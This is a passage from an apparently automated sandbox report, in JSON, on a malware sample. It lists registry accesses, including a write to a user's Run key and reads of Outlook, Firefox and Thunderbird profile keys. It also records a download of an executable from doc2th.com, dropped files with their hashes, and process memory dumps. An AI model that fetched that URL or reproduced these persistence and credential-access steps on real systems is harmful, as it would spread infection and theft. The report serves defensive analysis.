"registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\VBA\\Monitors", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 
"HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0413e2ad850e7146953cbb4c2672287e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1b5aad0cdb629e49a2c6203d4a6a948a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\1dab3177c2ac33448a4fe54b862a329e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\2a7b899b94a04042a46a1cd96dc2a18c", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7a302ee0804dab4ba930ea4351b9b4ac", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": 
"HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\7df1ae4ad074c146bb02f647b97dd78e", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], 
"reg_key_name": "HKEY_USERS\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "doc2th.com/tin/off.exe", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/247f0b1576c24e50830f6ee326dce494c6ba478d", "file_type": "created_file", "id": "file_3", "md5_hash": "437efd63bf864669ef4312750c25c462", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\lambdoidtegument.exe", "sha1_hash": "247f0b1576c24e50830f6ee326dce494c6ba478d", "sha256_hash": "c5221c1250b9584be4be97a30dde5f1b82c3509749df7bf76a7d0c9d85514a5a", "size": 237568, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da6159d0bb110771e34af83252e0c0d5929d7e3a", "file_type": "created_file", "id": "file_4", "md5_hash": "79f341fd3ffdd288d176c7ff38c456c3", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp", "sha1_hash": "da6159d0bb110771e34af83252e0c0d5929d7e3a", "sha256_hash": "71ede8a3db6c3437883e1ce09890aa1789ee8a4777263b8f5cd0324d493ed884", "size": 6144, "type": "extracted_file", "version": 1 }, { "archive_path": 
"extracted_files/4d2ee9b5ef7aa537db4ef414ae9854426f8ae578", "file_type": "created_file", "id": "file_5", "md5_hash": "9679973c4495843a13589d438c7f9677", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\olo0nds-\\olologim.jpeg", "sha1_hash": "4d2ee9b5ef7aa537db4ef414ae9854426f8ae578", "sha256_hash": "e3925df9b65909ca5128b30cd53f1c106cd1cf3b7d36a26be06091dbab712ad8", "size": 76788, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/495590c98ccbfcbc17a622e29912d4ad4009b36e", "file_type": "modified_file", "id": "file_2", "md5_hash": "5e96b592b960ec8b481f9a75f6d60e3b", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\b9mx3v6b\\foobaz[1].txt", "sha1_hash": "495590c98ccbfcbc17a622e29912d4ad4009b36e", "sha256_hash": "b17c0528463b2e7c191c2adaec4135848564597531cb9b7554b8fc80d1ac0c45", "size": 335, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e", "file_type": "modified_file", "id": "file_6", "md5_hash": "538010a9ee2bd83dce6e6181bcda3df3", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "5f8d3d25c60d5c9ecf2627422c77c7a895c67d4e", "sha256_hash": "9f70b9e987c662a9555182f299b9196ae5b3bb5e8128dd75e5ac3e6f49632b60", "size": 65536, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3de6de86748edb5d0f9c7ca464a2301ee03b753b", "file_type": "modified_file", "id": "file_7", "md5_hash": "52e5f12a1c455d32f6cafd01a89ad68e", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "3de6de86748edb5d0f9c7ca464a2301ee03b753b", "sha256_hash": "d2b2d583e7f30d11cb2daeae50b2617676783ed6cd360e0b47209d9787e224a2", "size": 32768, "type": "extracted_file", "version": 1 }, { "archive_path": 
"extracted_files/bc0c688702dc593e4a8448d723dd9311ee177aba", "file_type": "modified_file", "id": "file_8", "md5_hash": "d35b4ef54f22a55d2252d7c75217680e", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "bc0c688702dc593e4a8448d723dd9311ee177aba", "sha256_hash": "6871ece75631267dfa058661f117eda144a1f1936468df1d8cf7eb1f4b11474d", "size": 49152, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "filename": "process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "id": "proc_dump_9", "md5_hash": "8a6827fbd2f841fdf67dcd1b3d4b9a48", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0d136bc61da3f8747af7ee3cf7f97fa74abeaf10", "sha256_hash": "42ef950e7c3d05aa5c316b1591c1a7f6d99f5b00f01a3027f39dcb64bcc0f129", "size": 16384, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_10", "md5_hash": "13cfbc5c0a1e68327a00db61eee7505b", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5079ef0bb134a07343f839a8638675ffe428111c", "sha256_hash": "c1af339ff32c1ea69b7f72cc18a4c6cc2c2fae71238fe4d331ab40c8f4f289f6", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_11", 
"md5_hash": "e08155eed7f270e80f0b74a4ba086cbc", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "deb948fd2366472b303a04a02127e2cbefefb7d8", "sha256_hash": "89c8c1c094d5ab568316fd9613b5e5f3767bcc7e16d9c092de1670c34bbae1ea", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "a6d49c5ecb5f66641856a882ada76bfb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3d1f07414698e1673c1f964ac5038a2236f679e2", "sha256_hash": "6a09210a12a4097cdc385ae5adb6bc5aedb2e80bf8a7b38f2af531fe4871bb6c", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_13", "md5_hash": "c362fc9e52bb18bda34293b1016c99cb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "da31171d6db206fc50c6b8880e60c67a621fb9a3", "sha256_hash": "dfe446a947ed3c58cb34779a8a13b6883da163d0c7e620be97b68cf353a49cd2", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "62be6fba9e39af8e3ac2554f7623b988", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": 
"process", "type": "reference", "version": 1 }, "sha1_hash": "4d37f6bb02385ea9a76eca2cde95f0de497f140c", "sha256_hash": "8d9a52e37f1d53d3dc9582626e88cac5d6ab0e1efa3c0c5890a2e16f8d167cf4", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "6456e83f2e123493c7722f3fa4835489", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba67a294fd375f39ba1a4806dae660e65847028", "sha256_hash": "8f0c0ac34c3a304103c13e775390082989a573de703ae188fcce8420e4c571a7", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_16", "md5_hash": "1cecc060f54ebcf4bd02930d8b4ba3f5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b14fe942c0cf5067314545d7273c1f28596bd918", "sha256_hash": "9f0000116b97f2b2a78a0c7ce4e31acea3e66cc1b62b7d1f02f34888f4a2ebc9", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_17", "md5_hash": "cc19612d31e652cb5d470389aaa570f8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a2634c0063d45b9877ff288ec629203117d6481a", "sha256_hash": 
"eafbc44035c468fdfc71ce1cfc575edd978eb082cbf9db799056dc23054410cc", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "2feb0523686ccc395551ee2b022ec5e5", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "2d937caa005e66d5b670c9003163c720cf795c62", "sha256_hash": "0a5077118f2f1d36ccf6dadca5ab8641fd6311ce864f13c94ed81a7d1751341f", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": "7b7d0a66d963c50d72f4e8e1448f7a15", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3800ae56c9ebe74dca087f0416598ef23e3bf49e", "sha256_hash": "c98e1c9b54457be7a1296ae81541bad040983bea78a3d7eb34ed6c27127d1bcf", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "filename": "process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "588fd86980cb8df1dc05ba967280f33a", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0a63447a467c07bd09ff29a0c19974bc9564c5d5", "sha256_hash": "9c1db187fbe4f7fc0bf96009ee7e0206234228c0ad7e4612d728e9bb8aa4e7b2", "size": 135168, "type": "process_dump", "version": 1 }, { 
"archive_path": "process_dumps/process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "filename": "process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "id": "proc_dump_90", "md5_hash": "98a39b483079be0c19637295e2411154", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "466da0964a3b4e8160e51c607daf3906dc633c0a", "sha256_hash": "c75d3c5ca9519eef71445bb90484bf4821f2d00f0118e120a8739f553ed2796d", "size": 4923392, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_91", "md5_hash": "9d7987d6491b8f39032897639e6846ac", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7c032dd7808bef7ddad75a848908235c89a45d35", "sha256_hash": "c1e266485cf283c30d8ce37eed86c43b2e47c1d11e67e886237fa38107bd7278", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_92", "md5_hash": "99fbf11e9f2da0ba9c8b172d939ca936", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b06dee152339c8ea3ba54a783905df762fda2214", "sha256_hash": "194525d500ad0f501369d28027ad8b19bbc5f40b7d9fd2dbb539d8aa22cc5cd9", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", 
"filename": "process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_93", "md5_hash": "42eed3c2bc65ae9adb54c634cb45001c", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "78ead65b8d742fe4c64b15455fe60e8f3b1fcac2", "sha256_hash": "31d3805e61800120ba7ec44e1d3ee94ef1b538bd09074907520878f897cbd81c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_94", "md5_hash": "b3aa42f027ad81752afb94397b38e7c7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "33b88b08bdc9b612413a29877372233fe3f9a956", "sha256_hash": "1bdf95153002ec049d1aaa6f0f3594773b47cb6a57501072de555edd53c9e8e3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_95", "md5_hash": "b3aa42f027ad81752afb94397b38e7c7", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "33b88b08bdc9b612413a29877372233fe3f9a956", "sha256_hash": "1bdf95153002ec049d1aaa6f0f3594773b47cb6a57501072de555edd53c9e8e3", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_96", 
"md5_hash": "417bf6ab096d951efbe29db11587ee76", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "238354290ffaee07475d8ec4c243b3dc3bce8d81", "sha256_hash": "1084a0ba52d5471f8f1f82dbc405f172241ff5bd97e6453208ce5d113f0cae0a", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "filename": "process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "id": "proc_dump_97", "md5_hash": "f6b068f325c912a36d0925d38b46f45a", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6ff7f06c21a5761101be57a9a59896aa3ad3cbdd", "sha256_hash": "a32e1c820cbd803b1c8ee6a67fc706d17c8042f3a494484223bd67401e02bb7d", "size": 8192, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "filename": "process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "id": "proc_dump_98", "md5_hash": "65c062f9b28cf971640299d852b92504", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "be7f78141b3364f74d23cbb8dc6907bdaa86c7ec", "sha256_hash": "bb5c3d381483d03e323d93e8ba392a32cf1753eaf428a34891128a896e91700f", "size": 200704, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_99", "md5_hash": "5665eac7c89622a34464deb76a32c3d8", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": 
"process", "type": "reference", "version": 1 }, "sha1_hash": "4488e5db9f8e9b95c7b72e6b8e5abd550cd94b50", "sha256_hash": "4ba511c5bac5091b609447b2ae1f19ea92f42922484dad4c32d98e6a2d83df22", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_100", "md5_hash": "645b7ffda947df5883898f8e478ec252", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "793105402471e13e75f6ee4133706fed6d792fb5", "sha256_hash": "24c02a184ef14b832b19f688f96fd8fe745df97730168005aa81819cd0641074", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_101", "md5_hash": "c26443770922a8f2148d4cf37a871e7f", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "85a6085a6c4032418c22b54b77bf63e3effc6405", "sha256_hash": "36b4fe3de07340618c63ef985642c1a2e313cf197efd86dab841a26a5f823414", "size": 184320, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_102", "md5_hash": "d1c2f5c1085dd11edceabb9e90f56380", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9f9cc198c472f39e5d52135bde40531933a807bf", "sha256_hash": 
"5cf112c7865f75d2834ab4c8acc62e6253202702b3528faac548fd98e37a859a", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_21", "md5_hash": "8103b07082ffff36f8ed610d8fcab6e5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "b6a001fa1e148037e28cbe3655adea52cb56b770", "sha256_hash": "8537f19c87a3e5c6de0a82025875a1ffcba4164f2a8dc846ace576234249b384", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "c1586a260bfa00fb03057dde484b54c4", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c51e1ef53aca0ccc15897b320fedcbbca32f6e17", "sha256_hash": "eb66a5f395be771376b23e451db606701a88b1667ec4ab4c60b2c87195cbc295", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000360-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "f0c018588fb97b4381060a11ffecb6c5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ab5dd4e0d80806fe5bbf5bdcc00d60bfcce818de", "sha256_hash": "b2c16efaea2e1e2a189984bc72e68155906ba1422b6836b8c9e882d290041cf3", "size": 4096, "type": "process_dump", "version": 1 }, { 
"archive_path": "process_dumps/process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000361-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "9adf63fc24d929850431d36f9c1311d0", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "662a528a7a4b385e5f47f1470f666214d8054126", "sha256_hash": "cd1ca2c1847ac2b3dfc7679144b01b285eb27d3bdc0dd30ece10462039b7239c", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000362-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "bbb105a4536075877d824eabaea6760d", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": 